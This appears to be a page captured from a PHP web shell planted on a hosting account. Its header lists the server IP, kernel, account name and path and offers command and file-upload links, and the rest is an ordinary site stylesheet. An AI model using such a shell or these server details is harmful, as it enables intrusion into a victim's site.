1Server IP : 217.21.90.164 / Your IP : 216.73.216.51 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/public_html/css/css/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
@import url('https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;500;600;800;900&display=swap'); * { margin: 0px; padding: 0px; box-sizing: border-box; font-family: 'Playfair Display', serif; } body { position: relative; background-color: #fff; font-family: 'Playfair Display', serif; } p{ font-family: 'Playfair Display', serif; } .loginBox { min-height: 100vh !important; } .whatsapp-icon { position: fixed; bottom: 25px; right: 25px; z-index: 22; background-color: #25D366; width: 50px; height: 50px; border-radius: 10px; display: flex; justify-content: center; align-items: center; -webkit-animation: vibrate-2 0.3s linear infinite both; animation: vibrate-2 0.3s linear infinite both; } .Inquery-icon { position: fixed; bottom: 50%; right: 0px; top: 50%; z-index: 22; background-color: #dc3545; width: 35px; transform: translateY(-50%); height: 130px; text-orientation: upright; color: #fff; border-radius: 10px 0 0 10px; display: flex; align-items: center; justify-content: center; text-decoration: none; } .Inquery-icon:hover { color: #fff; } .Inquery-icon span { text-orientation: sideways; writing-mode: vertical-rl; font-size: 13px; font-weight: bold; font-family: "Roboto", Arial, Helvetica, sans-serif; } .services_bannner { background-color: pink; position: relative; } .booknow { position: absolute; top: 30%; left: 10%; background-color: #ca1a1a; color: #fff; border-radius: 15px 0 15px 0px; z-index: 22; padding: 10px; width: 320px; border: 2px solid #fff; } .rateing{ position: fixed; bottom: 25px; right: 95px; background-color:white; z-index:30; height:80px; padding:8px; border-radius:8px; box-shadow:1px 1px 8px pink; }.rateing img{ width:100%; height:100%; } @-webkit-keyframes vibrate-2 { 0% { -webkit-transform: translate(0); transform: translate(0); } 20% { -webkit-transform: translate(2px, -2px); transform: translate(2px, -2px); } 40% { -webkit-transform: translate(2px, 2px); transform: translate(2px, 2px); } 60% { -webkit-transform: translate(-2px, 2px); transform: translate(-2px, 2px); } 80% { -webkit-transform: translate(-2px, -2px); transform: translate(-2px, -2px); } 100% { -webkit-transform: translate(0); transform: translate(0); } } @keyframes vibrate-2 { 0% { -webkit-transform: translate(0); transform: translate(0); } 20% { -webkit-transform: translate(2px, -2px); transform: translate(2px, -2px); } 40% { -webkit-transform: translate(2px, 2px); transform: translate(2px, 2px); } 60% { -webkit-transform: translate(-2px, 2px); transform: translate(-2px, 2px); } 80% { -webkit-transform: translate(-2px, -2px); transform: translate(-2px, -2px); } 100% { -webkit-transform: translate(0); transform: translate(0); } }